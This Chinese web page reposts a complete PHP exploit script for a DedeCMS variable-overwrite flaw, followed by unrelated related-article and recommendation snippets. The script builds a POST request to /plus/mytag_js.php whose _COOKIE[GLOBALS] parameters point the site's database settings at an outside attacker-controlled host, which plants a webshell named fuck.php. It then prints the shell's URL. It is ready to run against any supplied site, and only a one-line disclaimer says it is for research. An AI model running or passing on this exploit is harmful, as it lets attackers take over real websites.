DeDeCMS(织梦)变量覆盖0day getshell
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- #!usr/bin/php -w
- <?php
- error_reporting(E_ERROR);
- set_time_limit(0);
- print_r('
- DEDEcms Variable Coverage
- Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
- );
- echo "\r\n";
- if($argv[2]==null){
- print_r('
- +---------------------------------------------------------------------------+
- Usage: php '.$argv[0].' url aid path
- aid=1 shellpath /data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
- Example:
- php '.$argv[0].'[url]www.site.com[/url] 1 old
- +---------------------------------------------------------------------------+
- ');
- exit;
- }
- $url=$argv[1];
- $aid=$argv[2];
- $path=$argv[3];
- $exp=Getshell($url,$aid,$path);
- if (strpos($exp,"OK")>12){
- echo "[*] Exploit Success \n";
- if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
- if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;
- if($aid==3)echo "[*]Shell:".$url."/$path/plus/fuck.php\n";
- }else{
- echo "[*]ExploitFailed \n";
- }
- function Getshell($url,$aid,$path){
- $id=$aid;
- $host=$url;
- $port="80";
- $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
- $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
- $data .= "Host:".$host."\r\n";
- $data .= "User-Agent:Mozilla/5.0(Windows NT 5.2; rv:5.0.1)Gecko/20100101Firefox/5.0.1\r\n";
- $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
- $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
- //$data .= "Accept-Encoding: gzip,deflate\r\n";
- $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
- $data .= "Connection: keep-alive\r\n";
- $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
- $data .= $content."\r\n";
- $ock=fsockopen($host,$port);
- if (!$ock) {
- echo "[*] No response from ".$host."\n";
- }
- fwrite($ock,$data);
- while (!feof($ock)) {
- $exp=fgets($ock, 1024);
- return $exp;
- }
- }
- ?>
- 摘自:http://sebug.net/vuldb/ssvid-20949
DeDeCMS(织梦)变量覆盖0day getshell的更多相关文章
- dedecms织梦首页被篡改 网站被黑被跳转的解决办法建议
2018年的中秋节即将来临,我们Sine安全公司,最近接到很多用dedecms程序的企业公司网站客户的反馈,说是公司网站经常被篡改,包括网站首页的标题内容以及描述内容,都被改成了什么北京赛车,北京PK ...
- dedecms织梦自定义表单发送到邮箱-用163邮箱发送邮件
https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=monline_3_dg&wd=dedecms 邮箱&oq=d ...
- dedecms织梦系统后台验证码图片不显示的解决方法
网站迁移后,dedecms织梦系统后台验证码图片不显示的解决方法通用解决方案-取消后台验证码功能因为没有验证码,不能进后台,所以修改php文件源代码:方法一:打开dede/login.php 找到如下 ...
- Dedecms织梦后台登陆验证码不显示几种解决方法
Dedecms织梦后台登陆验证码不显示几种解决方法,服务器所造成的验证码不显示问题看这里: 方法一:查看服务器的php版本是否与程序版本兼容(织梦程序PHP版本查看方法:打开www.96net.com ...
- DEDECMS织梦后台更新网站栏目无反应一键更新无响应的解决方法
很多站长朋友反应,经常会遇到DEDECMS织梦后台更新网站栏目无反应和一键更新无响应的问题,这个问题的所在就是在于恢复了数据或者覆盖了织梦后台文件之后,点击一键更新完全没反应,或者生成栏目的时候其他都 ...
- dedecms织梦如何删除所有的文章?
dedecms织梦如何删除所有的文章?dede一键删除所有文章的SQL命令: DELETE FROM dede_addonarticle WHERE aid >= 1 and aid<= ...
- dedecms 织梦ping服务插件 最新破解可用版
dedecms 织梦ping服务插件 最新破解可用版 ping_gbk.xml <module> <baseinfo> name=ping服务 team=井哥 time=20 ...
- DEDECMS织梦全站动态化访问(包括自由列表freelist)及发布内容时自动动态化设置
DEDECMS织梦 - 全站已有内容全部设置为动态化访问(包括自由列表freelist),以及发布内容时自动为动态化,设置分为三个步骤: 1.将所有文档设置为“仅动态”:执行以下mysql语句:upd ...
- dedecms织梦首页如何调用文章列表?
如果冯耀宗博客类似,首页调用文章列表,同时也有许多企业站需要调用文章列表,今天我与大家来分享一下dedecms织梦首页如何调用文章列表? {dede:arclist row='16' tit ...
随机推荐
- maven设计思想
20171108 maven设计思想? archetype 插件 学习插件.
- FPGA+ARM or FPGA+DSP?
网上有人说.现在的FPGA,ARM功能已经强大到无需DSP协助处理了,未来DSP会不会消声灭迹?是DSP取代FPGA和ARM,还是ARM,FPGA取代DSP呢?担心好不容易学精了DSP,结果DSP变成 ...
- 【面试总结】2019校招京东一面二面,及深信服技术面(已拿深信服offer),还有百度一面
百度一面: 1.自我介绍+项目介绍 2.进程和线程的区别 3.常用linux命令列举 4.堆排序 5.快速排序 反问环节. 现在的状态是岗位转推,毕竟百度投的是开发岗. 京东一面: 1.C++三大特性 ...
- 【原创】MHA二次检测功能测试
MHA提供了很多扩展的功能,其中有一个参数是secondary_check_script,这个参数可以使我们自定义扩展多路由,多链路的二次检测功能.减少网络故障切换,降低脑裂的发生. 在虚拟机上做了如 ...
- ceph journal操作
查询ceph journal的地方 ceph --admin-daemon /var/run/ceph/ceph-osd.0.asok config show | grep osd_journal & ...
- [ 原创 ]学习笔记-三种向ListView中填充简单文本的方法
Android 中ListView是很重要的一块内容 掌握ListView的基本用法 对学习安卓起着举足轻重的作用 今天就介绍一下三种向ListView 填充简单文本的方法 填充其他数据类型的用法之后 ...
- Qt Quick快速入门之线程基础
首先必须明确的是,Qt中的线程使用是相对复杂的,并不像C#中那么随意,特别是结合串口.网络编程等,使用时稍有不慎就会出问题,然后Qt里面经常出了问题就直接崩溃(这个真是谁用谁知道),所以如果在功能上用 ...
- luogu P2439 [SDOI2005]阶梯教室设备利用
题目链接 luogu P2439 [SDOI2005]阶梯教室设备利用 题解 dp 代码 #include<vector> #include<cstdio> #include& ...
- 奇妙的音乐-----WriteUp
据说flag就藏在这段音乐中,请仔细听. 格式:CTF{} 解题链接:http://ctf5.shiyanbar.com/crypto/123.zip 下载压缩包后里面有个音乐的zip文件 但是加密 ...
- Kibana安装及使用说明
Kibana安装及使用说明 Kibana是一个针对Elasticsearch的开源分析及可视化平台,用来搜索.查看交互存储在Elasticsearch索引中的数据. 官方地址:https://www. ...